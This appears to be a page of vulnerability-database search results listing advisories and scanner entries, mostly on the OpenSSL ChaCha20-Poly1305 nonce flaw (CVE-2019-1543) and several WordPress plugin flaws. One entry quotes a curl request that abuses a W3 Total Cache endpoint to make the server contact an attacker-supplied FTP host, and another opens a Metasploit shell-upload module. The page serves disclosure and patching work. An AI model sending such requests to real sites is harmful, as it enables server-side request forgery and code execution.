
8659 matches found

OpenVAS
added 2019/07/03 12:0 a.m. | 97 views

OpenSSL: ChaCha20-Poly1305 with long nonces (CVE-2019-1543) - Windows

OpenSSL is prone to a vulnerability which allows a nonce reuse. SPDX-FileCopyrightText: 2019 Greenbone AG. Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:openssl:openssl";...

CVSS: 7.4 | AI score: 7.4 | EPSS: 0.03184
Exploits: 0 | References: 6

Tenable Nessus
added 2019/07/02 12:0 a.m. | 51 views

Debian DSA-4475-1 : openssl - security update

Joran Dirk Greef discovered that overly long nonces used with ChaCha20-Poly1305 were incorrectly processed and could result in nonce reuse. This doesn't affect OpenSSL-internal uses of ChaCha20-Poly1305 such as TLS. (C) Tenable Network Security, Inc. The descriptive text and package checks in this...

CVSS: 7.4 | AI score: 6.3 | EPSS: 0.03184
Exploits: 0 | References: 5

Debian
added 2019/07/01 9:12 p.m. | 126 views

[SECURITY] [DSA 4475-1] openssl security update

------------------------------------------------------------------------- Debian Security Advisory DSA-4475-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff July 01, 2019 https://www.debian.org/security/faq -...

CVSS: 7.4 | AI score: 6.3 | EPSS: 0.03184
Exploits: 0

ArchLinux
added 2019/06/11 12:0 a.m. | 43 views

[ASA-201906-7] openssl: information disclosure

Arch Linux Security Advisory ASA-201906-7 ========================================= Severity: Low Date : 2019-06-11 CVE-ID : CVE-2019-1543 Package : openssl Type : information disclosure Remote : Yes Link : https://security.archlinux.org/AVG-919 Summary ======= The package openssl before version...

CVSS: 7.4 | AI score: 5.9 | EPSS: 0.03184
Exploits: 0 | References: 4

ArchLinux
added 2019/06/11 12:0 a.m. | 30 views

[ASA-201906-6] lib32-openssl: information disclosure

Arch Linux Security Advisory ASA-201906-6 ========================================= Severity: Low Date : 2019-06-11 CVE-ID : CVE-2019-1543 Package : lib32-openssl Type : information disclosure Remote : Yes Link : https://security.archlinux.org/AVG-920 Summary ======= The package lib32-openssl...

CVSS: 7.4 | AI score: 5.9 | EPSS: 0.03184
Exploits: 0 | References: 4

Tenable Nessus
added 2019/06/03 12:0 a.m. | 291 views

OpenSSL 1.1.1 < 1.1.1c Vulnerability

The version of OpenSSL installed on the remote host is prior to 1.1.1c. It is, therefore, affected by a vulnerability as referenced in the 1.1.1c advisory. - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce...

CVSS: 7.4 | AI score: 6.3 | EPSS: 0.03184
Exploits: 0 | References: 4

Tenable Nessus
added 2019/06/03 12:0 a.m. | 31 views

OpenSSL 1.1.0 < 1.1.0k Vulnerability

The version of OpenSSL installed on the remote host is prior to 1.1.0k. It is, therefore, affected by a vulnerability as referenced in the 1.1.0k advisory. - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce...

CVSS: 7.4 | AI score: 6.3 | EPSS: 0.03184
Exploits: 0 | References: 4

Cvelist
added 2019/05/22 5:5 p.m. | 27 views

CVE-2019-11231

An issue was discovered in GetSimple CMS through 3.3.15. Insufficient input sanitation in the theme-edit.php file allows upload of files with arbitrary content (PHP code, for example). This vulnerability is triggered by an authenticated user; however, authentication can be bypassed. According to th...

AI score: 9.7 | EPSS: 0.49943
Exploits: 5 | References: 2

Tenable Nessus
added 2019/05/08 12:0 a.m. | 14 views

Rockwell Automation/Allen-Bradley MicroLogix Controllers <= 16.00 Nonce Key Pair Reuse

Binary data 720126.prm...

CVSS: 9.8 | AI score: 7.3 | EPSS: 0.00043
Exploits: 0 | References: 2

Tenable Nessus
added 2019/05/06 12:0 a.m. | 27 views

EulerOS 2.0 SP2 : openssl110f (EulerOS-SA-2019-1327)

According to the version of the openssl110f packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value...

CVSS: 7.4 | AI score: 6.3 | EPSS: 0.03184
Exploits: 0 | References: 2

wpexploit
added 2019/05/06 12:0 a.m. | 35 views

W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar

The implementation of opcacheflushfile calls fileexists with a parameter fully controlled by the user. curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flushfile&file=ftp://y.y.y.y:zzzz/' Note: The nonce value is given ...

AI score: 1.6
Exploits: 0 | References: 1

Tenable Nessus
added 2019/05/06 12:0 a.m. | 45 views

EulerOS 2.0 SP3 : openssl110f (EulerOS-SA-2019-1328)

According to the version of the openssl110f packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value...

CVSS: 7.4 | AI score: 6.3 | EPSS: 0.03184
Exploits: 0 | References: 2

Veracode
added 2019/05/02 4:55 a.m. | 16 views

Authentication Bypass

tomcat6 is vulnerable to authentication bypass. The vulnerability exists through the ability to perform replay attacks after a nonce becomes stale...

CVSS: 2.6 | AI score: 6.1 | EPSS: 0.00338
Exploits: 2 | References: 6 | Affected Software: 1

Packet Storm
added 2019/04/04 12:0 a.m. | 339 views

WordPress 5.0.0 crop-image Shell Upload

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Crop-image Shell Upload', 'Description' = %q This module exploits a path traversal and a local file inclusion vulnerability on WordPres...

CVSS: 6.5 | AI score: 7.6 | EPSS: 0.93889
Exploits: 10

RedhatCVE
added 2019/04/03 11:49 p.m. | 33 views

CVE-2019-1543

ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value (IV) should be 96 bits (12 bytes). OpenSSL allows a variable nonce length and front pads the nonce with 0 bytes if it is less than 12 bytes. However it also...

CVSS: 7.4 | AI score: 0.5 | EPSS: 0.03184
Exploits: 0 | References: 3

myhack58
added 2019/03/17 12:0 a.m. | 303 views

WordPress 5.1: from CSRF to RCE-vulnerability warning-the black bar safety net

One, Foreword Note: this exploit and the environment is more complex, the actual value may not be very high, but for XSS with permissions management also has certain reference value. Last month we published a WordPress 5.0, a remote code execution (RCE) vulnerabilities required by the authentication...

AI score: 0.2
Exploits: 0

Veracode
added 2019/03/15 5:49 a.m. | 12 views

Replay Attack

http-auth is vulnerable to replay attack. The vulnerability exists because it does not properly invalidate expired nonces in validateNonce and allows the replay attack when the client specifies a large nonceCount value...

AI score: 6.5
Exploits: 0

CNVD
added 2019/03/14 12:0 a.m. | 1 views

WordPress 5.1.1 Nonce Bypass Stored XSS Vulnerability

WordPress is a free and open source blogging software and content management system that uses PHP and MySQL as its platform. WordPress 5.1.1 Nonce Bypass suffers from a stored XSS vulnerability, which can be exploited by an attacker to inject malicious JavaScript scripts, or even modify the backend...

AI score: 7
Exploits: 0 | References: 1

0day.today
added 2019/03/12 12:0 a.m. | 48 views

WordPress Fastest Cache 0.8.9.0 Arbitrary File Deletion Exploit

WordPress WP Fastest Cache plugin versions 0.8.9.0 and below suffer from an arbitrary file deletion vulnerability. The wordpress plugin "WP Fastest Cache" 0 suffered from an arbitrary file deletion bug. Description A successful attack allows an unauthenticated attacker to specify a path to a...

AI score: 6.5 | EPSS: 0.0384
Exploits: 3

Tenable Nessus
added 2019/03/08 12:0 a.m. | 31 views

FreeBSD : OpenSSL -- ChaCha20-Poly1305 nonce vulnerability (e56f2f7c-410e-11e9-b95c-b499baebfeaf)

The OpenSSL project reports: Low: ChaCha20-Poly1305 with long nonces (CVE-2019-1543). ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value (IV) should be 96 bits (12 bytes). OpenSSL allows a variable nonce length...

CVSS: 7.4 | AI score: 6.3 | EPSS: 0.03184
Exploits: 0 | References: 3